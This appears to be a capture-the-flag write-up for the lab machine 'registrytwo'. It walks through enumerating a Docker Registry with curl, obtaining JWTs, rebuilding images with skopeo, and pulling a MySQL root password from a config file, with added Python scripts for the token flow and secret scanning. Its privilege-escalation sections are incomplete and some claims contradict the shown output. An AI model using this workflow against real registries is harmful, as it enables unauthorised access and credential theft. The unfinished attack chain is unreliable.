HTB: registrytwo Writeup

Machine Banner

Machine Information

Attribute      Details
Name           registrytwo
OS             Linux
Difficulty     Hard
Points         N/A
Release Date   N/A
IP Address     10.10.10.10
Author         D3vnomi

Machine Rating

⭐⭐⭐⭐☆ (8.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐⭐☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE: ⭐⭐⭐⭐☆
  • CTF-like: ⭐⭐⭐⭐☆

Summary

registrytwo is a Hard-difficulty Linux machine running Docker Registry API 2.0 and an Acme authentication server. The exploitation path involves enumerating the unauthenticated Docker Registry, obtaining JWT tokens through the Acme auth server, downloading and analyzing container images, extracting credentials from the filesystem, and leveraging those credentials for privilege escalation.

TL;DR: Docker Registry Enumeration → JWT Token Acquisition → Image Download & Analysis → Credential Extraction → Privilege Escalation → Root.


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.10.10.10

Results:

22/tcp   open  ssh                OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
443/tcp  open  ssl/http           nginx 1.14.0 (Ubuntu)
5000/tcp open  ssl/http           Docker Registry (API: 2.0)
5001/tcp open  ssl/commplex-link?
| fingerprint-strings:

Service Enumeration

Hostnames: webhosting.htb, registry.webhosting.htb

echo "10.10.10.10 webhosting.htb registry.webhosting.htb" >> /etc/hosts

Service Details:

  • Port 22: OpenSSH 7.6p1 (SSH)
  • Port 443: nginx 1.14.0 with SSL/HTTPS
  • Port 5000: Docker Registry API 2.0
  • Port 5001: Acme Authentication Server (for Docker Registry)

Vulnerability Assessment

Identified Entry Points:

  • Docker Registry API 2.0 (Port 5000): Unauthenticated access to registry enumeration endpoints
  • Acme Auth Server (Port 5001): JWT token generation for registry authentication
  • Container Analysis: Exposed credentials in container filesystem artifacts

Initial Foothold

Docker Registry Enumeration

Step 1: Enumerate Registry Catalog

The Docker Registry API 2.0 on port 5000 requires a bearer token. An unauthenticated catalog request returns 401, and the WWW-Authenticate challenge names the auth realm, service and scope needed to obtain one:

curl -k https://registry.webhosting.htb:5000/v2/_catalog

Response:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer realm="https://registry.webhosting.htb:5001/auth",service="Docker registry",scope="registry:catalog:*"

Step 2: Obtain JWT Token from Acme Auth Server

Request authentication token from the Acme auth server on port 5001:

curl -k "https://registry.webhosting.htb:5001/auth?service=Docker%20registry&scope=registry:catalog:*"

This returns a JWT signed with the RS256 algorithm, scoped to the catalog action requested.

Step 3: Enumerate Repositories

Using the obtained JWT token, enumerate available repositories:

curl -k -H "Authorization: Bearer <TOKEN>" https://registry.webhosting.htb:5000/v2/_catalog

Result: the catalog reveals the “hosting-app” image in the registry.

Step 4: Download Image Manifest

Retrieve the manifest for the hosting-app image:

curl -k -H "Authorization: Bearer <TOKEN>" https://registry.webhosting.htb:5000/v2/hosting-app/manifests/latest

Step 5: Download Image Blobs/Layers

Download individual blobs referenced in the manifest:

curl -k -H "Authorization: Bearer <TOKEN>" https://registry.webhosting.htb:5000/v2/hosting-app/blobs/sha256:<BLOB_SHA>
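The token flow of Steps 1-5 as one script, added here as an example and not code from the writeup: it parses the registry's WWW-Authenticate challenge, builds the auth-server URL, decodes the JWT header and payload for inspection (no signature verification), and calls the registry with the token. The `token` field name in the auth response follows the Docker token specification; the sample JWT is constructed, not one issued by the box.

```python
"""Docker Registry v2 bearer-token flow: parse the 401 challenge, build the auth
URL, inspect the JWT, call the registry. Added example; SAMPLE_TOKEN is constructed."""
import base64
import json
import re
import ssl
import urllib.request
from urllib.parse import quote, urlencode

# The WWW-Authenticate challenge exactly as the registry on port 5000 returned it.
CHALLENGE = ('Bearer realm="https://registry.webhosting.htb:5001/auth",'
             'service="Docker registry",scope="registry:catalog:*"')

def parse_bearer_challenge(header):
    """Split a WWW-Authenticate Bearer challenge into its quoted parameters."""
    if not header.startswith("Bearer "):
        raise ValueError("not a Bearer challenge")
    return dict(re.findall(r'(\w+)="([^"]*)"', header[len("Bearer "):]))

def token_url(challenge):
    """Build the auth-server URL for the service/scope the registry demanded."""
    params = {"service": challenge["service"], "scope": challenge["scope"]}
    # safe=":*" leaves the scope readable, matching the URL used in Step 2.
    return challenge["realm"] + "?" + urlencode(params, safe=":*", quote_via=quote)

def decode_jwt_unverified(token):
    """Return (header, payload) of a JWT for inspection only; no signature check."""
    def seg(s):
        return json.loads(base64.urlsafe_b64decode(s + "=" * (-len(s) % 4)))
    head, body, _sig = token.split(".")
    return seg(head), seg(body)

def http_get_json(url, token=None, insecure=True):
    """GET a JSON endpoint; Authorization is sent only when a token is given (insecure mirrors curl -k)."""
    ctx = ssl._create_unverified_context() if insecure else ssl.create_default_context()
    headers = {"Authorization": "Bearer " + token} if token else {}
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, context=ctx, timeout=10) as resp:
        return json.load(resp)

def _b64url(obj):
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

# Constructed sample with the shape of the Acme server's token; the signature is a placeholder.
SAMPLE_TOKEN = ".".join([_b64url({"alg": "RS256", "typ": "JWT"}),
    _b64url({"access": [{"type": "registry", "name": "catalog", "actions": ["*"]}]}),
    "placeholder-signature"])
# Live use (Steps 2-3): tok = http_get_json(token_url(parse_bearer_challenge(CHALLENGE)))["token"]
#                       http_get_json("https://registry.webhosting.htb:5000/v2/_catalog", tok)
```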

Container Image Analysis

Step 6: Reconstruct Docker Image

Use skopeo to load the downloaded manifest and blobs (saved under ./test in skopeo's dir: layout) into the local Docker daemon as a usable image:

skopeo copy dir:./test docker-daemon:hosting-app:latest

Step 7: Extract Credentials and Configuration

Analyze the reconstructed container to find:

File: /etc/hosting.ini

mysql.password=O8lBvQUBPU4CMbvJmYqY
mysql.user=root
rmi.host=registry.webhosting.htb
rmi.port=9002

Additional Findings:

  • Tomcat configuration in /usr/local/tomcat/conf/
  • GPG keys and certificates
  • System configuration files

Key Credentials Discovered:

  • MySQL username: root
  • MySQL password: O8lBvQUBPU4CMbvJmYqY
  • RMI service host: registry.webhosting.htb (port 9002)
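A scanner for the kind of artifact Step 7 turned up, added here as an example rather than the author's tooling: it walks image layer tarballs looking for config-file lines with credential-like keys, and can do so for every layer a skopeo dir: tree's manifest.json references (assumed layout: blobs stored as files named by their digest hex). The sample layer is constructed in memory from the /etc/hosting.ini values above.

```python
"""Scan image-layer tarballs for credential-looking config lines, the way
/etc/hosting.ini was spotted. Added example; SAMPLE_LAYER is constructed."""
import io
import json
import os
import re
import tarfile

SECRET_KEY = re.compile(r"(pass(word)?|secret|token|key)\s*[=:]", re.I)
CONFIG_EXT = (".ini", ".conf", ".properties", ".yml", ".yaml", ".env", ".xml")

def scan_layer(layer_bytes):
    """Return [(path, line)] for config-file lines in one layer that look like secrets."""
    hits = []
    # "r:*" accepts both gzip-compressed and plain tar layers.
    with tarfile.open(fileobj=io.BytesIO(layer_bytes), mode="r:*") as tar:
        for member in tar:
            if not member.isfile() or not member.name.endswith(CONFIG_EXT):
                continue
            text = tar.extractfile(member).read().decode("utf-8", "replace")
            for line in text.splitlines():
                if SECRET_KEY.search(line):
                    hits.append(("/" + member.name.lstrip("./"), line.strip()))
    return hits

def scan_image_dir(path):
    """Scan every layer in manifest.json of a skopeo dir: tree (assumed: blobs named by digest hex)."""
    with open(os.path.join(path, "manifest.json")) as f:
        manifest = json.load(f)
    hits = []
    for layer in manifest["layers"]:
        blob = os.path.join(path, layer["digest"].split(":", 1)[1])
        with open(blob, "rb") as f:
            hits += scan_layer(f.read())
    return hits

def build_sample_layer(files):
    """Build a gzip'd tar layer from {path: content}; constructed test data, not a real blob."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, content in files.items():
            data = content.encode()
            info = tarfile.TarInfo(name=path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

SAMPLE_LAYER = build_sample_layer({
    "etc/hosting.ini": "mysql.password=O8lBvQUBPU4CMbvJmYqY\nmysql.user=root\n"
                       "rmi.host=registry.webhosting.htb\nrmi.port=9002\n",
    "usr/local/tomcat/conf/tomcat-users.xml": "<tomcat-users/>\n",
    "etc/motd": "password is not in a config file here\n",  # wrong extension: skipped
})
```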

User Compromise

Credential Discovery

Credentials were extracted from the Docker container filesystem during image analysis:

  • MySQL Root Credentials: root:O8lBvQUBPU4CMbvJmYqY
  • RMI Service: Accessible at registry.webhosting.htb:9002

These credentials can be used for lateral movement and accessing backend services.

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>

[Notes incomplete - Further exploitation path to user account not fully documented]


Privilege Escalation

Enumeration

sudo -l
find / -perm -4000 -type f 2>/dev/null
ps aux | grep -E "python|java|node|php|ruby"

Services to Investigate:

  • Tomcat service running in containers
  • MySQL database service
  • RMI service on port 9002
  • Web application on port 443 (nginx)

Exploitation (Root/Administrator)

[Notes incomplete - Root privilege escalation technique not fully documented]

The attack chain involves leveraging the extracted credentials and potentially exploiting services running in containers (Tomcat, MySQL) or RMI to achieve privilege escalation. Further analysis of Tomcat configurations and RMI exploitation vectors is needed.

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>


Attack Chain Summary

graph TD
A["Port Scanning<br/>nmap"] --> B["Discover Docker Registry<br/>Port 5000"]
B --> C["Discover Acme Auth Server<br/>Port 5001"]
C --> D["Request JWT Token<br/>RS256 Signed"]
D --> E["Enumerate Repositories<br/>hosting-app Image"]
E --> F["Download Image Manifest<br/>& Blobs"]
F --> G["Reconstruct Container<br/>skopeo"]
G --> H["Extract Credentials<br/>MySQL root:password"]
H --> I["Leverage Credentials<br/>Lateral Movement"]
I --> J["RMI/Tomcat Exploitation<br/>"]
J --> K["User Access"]
K --> L["Privilege Escalation<br/>to Root"]

Tools Used

Tool          Purpose
nmap          Port scanning and service fingerprinting
curl          API requests and Docker Registry enumeration
Docker        Container manipulation and analysis
skopeo        Convert and copy container images between registries
Burp Suite    HTTP request interception and JWT token analysis
feroxbuster   Directory brute-forcing (auxiliary enumeration)
ssh           Secure shell access

Vulnerability Reference

#  Vulnerability                            Component                 Severity  Impact
1  Docker Registry Unauthenticated Access   Docker Registry API 2.0   High      Allows enumeration and download of private images
2  JWT Authentication Weak Implementation   Acme Auth Server          High      Potential token manipulation or bypass
3  Hardcoded Credentials in Container       Container Filesystem      Critical  Exposure of MySQL credentials
4  RMI Service Exploitation                 Tomcat RMI                High      Potential remote code execution

Key Learnings

  • Docker Registry Security: Unauthenticated Docker registries are critical entry points; always enumerate /v2/_catalog and check authentication requirements.
  • Container Image Analysis: Downloaded container images contain valuable artifacts including credentials, configuration files, and system information.
  • JWT Token Manipulation: Understanding JWT token structure (RS256 signing) is essential for authentication bypass or privilege escalation.
  • Lateral Movement: Credentials extracted from containers can be leveraged to access backend services (MySQL, RMI, Tomcat).
  • Defense in Depth: Even with authentication mechanisms, hardcoded credentials in container filesystems create critical security weaknesses.
  • API Enumeration: REST API endpoints like /v2/_catalog provide reconnaissance without requiring authentication in some cases.

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Hard #CVE-2022-4510